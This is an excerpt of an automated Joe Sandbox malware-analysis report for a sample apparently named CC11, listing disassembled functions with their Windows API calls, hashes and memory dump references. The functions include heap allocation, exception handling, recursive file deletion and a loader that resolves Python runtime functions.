Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction ID: 3030356d8aea27503f28b97687b9d8cdd9900df51c58f47a08bc158583813bd2
Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction Fuzzy Hash: F1218421F1C64261EEB49779A95037D12D2EF847A4F0552B5DA2EC77DACE6CE482C301

Function 00007FF8B830DCF0 Relevance: 2.6, APIs: 2, Instructions: 50memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF8B83134C9,?,?,?,00007FF8B83539B1,?,?,?,?,00007FF8B83178EA,?,?,?), ref: 00007FF8B830DD38

Memory Dump Source

Source File: 00000010.00000002.2270007702.00007FF8B8301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B8300000, based on PE: true

Associated: 00000010.00000002.2269966833.00007FF8B8300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000010.00000002.2270141203.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000010.00000002.2270202656.00007FF8B83EF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000010.00000002.2270256702.00007FF8B83F2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8b8300000_CC11.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 27d2ecc8a82d26b6ee3a94a029cf6d96569e999f53c42dbd91e108040fe652f2
Instruction ID: efeb553a2444813e880bdb101838b2b1a0573efb175e40619d1ddb9187c13cbc
Opcode Fuzzy Hash: 27d2ecc8a82d26b6ee3a94a029cf6d96569e999f53c42dbd91e108040fe652f2
Instruction Fuzzy Hash: D1118C20A1974685FA549BAD98603B9A390AF8CFD0F0C5234DB1E8B3D5DF2DF4528748

Function 00007FF69002B1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69002B1E4

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction ID: 7eb7d49f67f8f43a6f4a43045c99bf4c855238541891f3583fbc4642f29adac5
Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction Fuzzy Hash: 4641BC32918242A7EA34DA3DA55127D73A2FB96B80F140171DA8EC3798CF3CE503C751

Function 00007FF6900176A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF69001774A

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 13ca75d532394eb5dd34a4634b4a0a9fa9f510c5e6e64636f920fa999b5c02b4
Instruction ID: 2cde29e0d7c62d59738e9bba067541559e27a564004f52a75a2aa519c8185c2d
Opcode Fuzzy Hash: 13ca75d532394eb5dd34a4634b4a0a9fa9f510c5e6e64636f920fa999b5c02b4
Instruction Fuzzy Hash: 62218621B0C65165FA759B36A9047BAA651FF45BD8F8C44B0DE0D877CADE7DE081C700

Function 00007FF69002AC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69002ACD2

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
Instruction ID: 51178b44efaede3e4e49037e6a1a880cd6dd35f58b245a36aa54042dd8a9664c
Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
Instruction Fuzzy Hash: FB31AD22E18642A7F725AB3D98413BD2650FF51BA4F5101B5EA2D837DACFBCE442C321

Function 00007FF690028C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF690028CA7

Part of subcall function 00007FF690028DA0: GetModuleHandleExW.KERNEL32 ref: 00007FF690028DC5
Part of subcall function 00007FF690028DA0: GetProcAddress.KERNEL32 ref: 00007FF690028DDB
Part of subcall function 00007FF690028DA0: FreeLibrary.KERNEL32 ref: 00007FF690028E02

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
Instruction ID: b97b162001098a0d3c7c2f4c1fd85375abab0d468968d46d8b3b1a7ebc7ab250
Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
Instruction Fuzzy Hash: B921AC36A167069AEB249F78C4412EC33A0FB44318F5406BAD72C86BC9EF38D486CB50

Function 00007FF6900252A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF690025209

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction ID: 984a404bb94b954902b41c485cb409979f1ab9b72b582eb637424909e4a71bb4
Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction Fuzzy Hash: 6E117221E1D68191EA709F69940027EA2A4FF96B80F4444B1EF4CD7BDECF3CD9568744

Function 00007FF690035664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF690035687

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction ID: b3a918e02be0fa1d3108c34ee9a8faed2bcfedea0e2400f2a863cdcc12a80b37
Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction Fuzzy Hash: 86219232A18A8296DB728F28E44177976A0EB98B95F544234EA5DC77EDDF3CD401CB00

Function 00007FF69001F6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69001F730

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction ID: 0e9434739f93ba86557cd647b26fb1fdb4877b31e6c570a190ab573cdf57f280
Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction Fuzzy Hash: 0501C021A0C78251EA64DB769900079A6A5FF95FE4F4846B1EE6C93BDEDF3CE5028300

Function 00007FF8B83176F0 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2270007702.00007FF8B8301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B8300000, based on PE: true

Associated: 00000010.00000002.2269966833.00007FF8B8300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000010.00000002.2270141203.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000010.00000002.2270202656.00007FF8B83EF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000010.00000002.2270256702.00007FF8B83F2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8b8300000_CC11.jbxd

Similarity

API ID: __vcrt_initialize_locks__vcrt_initialize_winapi_thunks
String ID:
API String ID: 2444027679-0
Opcode ID: 267e1e33e985904d0087cc8bc5e2fb633dc7a44b110c5dfb642aea7bba0d9fe0
Instruction ID: ef6b4eab6556568d4ed8887d9687d7f963a82f9b3ea5fd4c553fa640225c149f
Opcode Fuzzy Hash: 267e1e33e985904d0087cc8bc5e2fb633dc7a44b110c5dfb642aea7bba0d9fe0
Instruction Fuzzy Hash: 08114921E09A0281FE615B2CE5903B96290AF08BE0F5C4139DB6D027D5DF2CF842C308

Function 00007FF6900181A0 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6900186B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF690013FA4,00000000,00007FF690011925), ref: 00007FF6900186E9

LoadLibraryExW.KERNELBASE(?,00007FF690015C06,?,00007FF69001308E), ref: 00007FF6900181C2

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 637d93bcaba6b3ef3808867d80487fbb7a80e425bc13fea3da321eb74d5281f1
Instruction ID: 14d405c6adbdee7fe211dd424e6ec3afce2a49180b8f22968e08e8d9e1a695b9
Opcode Fuzzy Hash: 637d93bcaba6b3ef3808867d80487fbb7a80e425bc13fea3da321eb74d5281f1
Instruction Fuzzy Hash: 98D0C201F2424191FAA4AB7BBA465796152DFCDBC4F888034EF1C83B4EDC3CC0910B00

Function 00007FF69002C90C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF69001FFB0,?,?,?,00007FF69002161A,?,?,?,?,?,00007FF690022E09), ref: 00007FF69002C94A

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction ID: 08999c98d486a7a6c1b3ea8ee17394ec9f43ee3abe5a5cc644e4f4fca7e2f6ad
Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction Fuzzy Hash: 4FF01C11F19287A5FE7567BA5859B791280DF88BA0F4846B0DD2EC67CDDE2CE5828210

Non-executed Functions

Function 00007FF6900179B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017A1B
RemoveDirectoryW.KERNEL32(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017A9E
DeleteFileW.KERNEL32(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017ABD
FindNextFileW.KERNEL32(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017ACB
FindClose.KERNEL32(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017ADC
RemoveDirectoryW.KERNEL32(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017AE5

Strings

%s\*, xrefs: 00007FF6900179E2

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction ID: 502c55dc6f1132b9c735b8fea1043c38e0679fed4e087c35def80b6b0518c691
Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction Fuzzy Hash: A4416F21A0C942A5EAB09B34E4545BD6361FF98758F800672E69DC37DCDF7CD68AC701

Function 00007FF69001C44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF69001C468
RtlCaptureContext.KERNEL32 ref: 00007FF69001C495
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF69001C4AF
RtlVirtualUnwind.KERNEL32 ref: 00007FF69001C4F0
IsDebuggerPresent.KERNEL32 ref: 00007FF69001C544
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF69001C561
UnhandledExceptionFilter.KERNEL32 ref: 00007FF69001C56C

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction ID: 6e3b296df5b792b3ce2b770a0103b577d5eee7f756f0895939c08f0f5dc19ae8
Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
Instruction Fuzzy Hash: 23312A72608A8196EB709F64E890BEE7361FB88748F04417ADB4D87B99DF38D548C710

Function 00007FF690029924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF69002999D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6900299B5
RtlVirtualUnwind.KERNEL32 ref: 00007FF6900299F0
IsDebuggerPresent.KERNEL32 ref: 00007FF690029A29
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF690029A33
UnhandledExceptionFilter.KERNEL32 ref: 00007FF690029A3E

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction ID: 7571340e09dacc5694d6e7fe316bb15b811628a7ed369b3f96eaa17f06741a37
Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
Instruction Fuzzy Hash: 24314E36A18B8196DB60CF39E8406AE73A4FB88758F540275EA9D87B99DF3CD145CB00

Function 00007FF690030B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF690030BD0
FindFirstFileExW.KERNEL32 ref: 00007FF690030CDA

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
Instruction ID: 78469d1220ff25ba6e4145801ff1408b35cefc5135df6680f8017bc7bc318677
Opcode Fuzzy Hash: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
Instruction Fuzzy Hash: 5BB1F322B1A69291EA72DB75D420ABD63A0EB48BE4F445171EE5E87BCDDF3CE451C300

Function 00007FF6900150B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF6900150C0
GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF690015101
GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF690015126
GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF69001514B
GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF690015173
GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF69001519B
GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF6900151C3
GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF6900151EB
GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF690015213

Strings

PySys_GetObject, xrefs: 00007FF690015641, 00007FF69001565D
PyUnicode_Decode, xrefs: 00007FF6900156B9, 00007FF6900156D5
Py_IsInitialized, xrefs: 00007FF690015191, 00007FF6900151AD
PyConfig_SetString, xrefs: 00007FF690015281, 00007FF69001529D
PyErr_Occurred, xrefs: 00007FF690015349, 00007FF690015365
PyUnicode_DecodeFSDefault, xrefs: 00007FF6900156E1, 00007FF6900156FD
Failed to get address for %hs, xrefs: 00007FF6900150D9
PyErr_NormalizeException, xrefs: 00007FF690015321, 00007FF69001533D
PyConfig_SetBytesString, xrefs: 00007FF690015259, 00007FF690015275
PyUnicode_Replace, xrefs: 00007FF690015781, 00007FF69001579D
PyMem_RawFree, xrefs: 00007FF6900154B1, 00007FF6900154CD
PyUnicode_Join, xrefs: 00007FF690015759, 00007FF690015775
Py_InitializeFromConfig, xrefs: 00007FF690015169, 00007FF690015185
Py_PreInitialize, xrefs: 00007FF6900151B9, 00007FF6900151D5
PyEval_EvalCode, xrefs: 00007FF6900153C1, 00007FF6900153DD
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6900155C9, 00007FF6900155E5
PyList_Append, xrefs: 00007FF690015461, 00007FF69001547D
PyUnicode_FromFormat, xrefs: 00007FF690015709, 00007FF690015725
PyConfig_Clear, xrefs: 00007FF6900151E1, 00007FF6900151FD
PyImport_ExecCodeModule, xrefs: 00007FF690015411, 00007FF69001542D
PyImport_ImportModule, xrefs: 00007FF690015439, 00007FF690015455
PyErr_Print, xrefs: 00007FF690015371, 00007FF69001538D
PyStatus_Exception, xrefs: 00007FF690015619, 00007FF690015635
PyConfig_SetWideStringList, xrefs: 00007FF6900152A9, 00007FF6900152C5
PyErr_Clear, xrefs: 00007FF6900152D1, 00007FF6900152ED
PyConfig_Read, xrefs: 00007FF690015231, 00007FF69001524D
PyConfig_InitIsolatedConfig, xrefs: 00007FF690015209, 00007FF690015225
PyObject_GetAttrString, xrefs: 00007FF690015551, 00007FF69001556D
PyObject_CallFunctionObjArgs, xrefs: 00007FF690015529, 00007FF690015545
PyMarshal_ReadObjectFromString, xrefs: 00007FF690015489, 00007FF6900154A5
Py_ExitStatusException, xrefs: 00007FF69001511C, 00007FF690015138
PyModule_GetDict, xrefs: 00007FF6900154D9, 00007FF6900154F5
Py_Finalize, xrefs: 00007FF690015141, 00007FF69001515D
PyRun_SimpleStringFlags, xrefs: 00007FF6900155F1, 00007FF69001560D
PyUnicode_AsUTF8, xrefs: 00007FF690015691, 00007FF6900156AD
PySys_SetObject, xrefs: 00007FF690015669, 00007FF690015685
Py_DecodeLocale, xrefs: 00007FF6900150F7, 00007FF690015113
PyUnicode_FromString, xrefs: 00007FF690015731, 00007FF69001574D
PyErr_Restore, xrefs: 00007FF690015399, 00007FF6900153B5
PyObject_CallFunction, xrefs: 00007FF690015501, 00007FF69001551D
Py_DecRef, xrefs: 00007FF6900150B6, 00007FF6900150D2
PyErr_Fetch, xrefs: 00007FF6900152F9, 00007FF690015315
PyObject_SetAttrString, xrefs: 00007FF690015579, 00007FF690015595
GetProcAddress, xrefs: 00007FF6900150E0
PyImport_AddModule, xrefs: 00007FF6900153E9, 00007FF690015405
PyObject_Str, xrefs: 00007FF6900155A1, 00007FF6900155BD

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

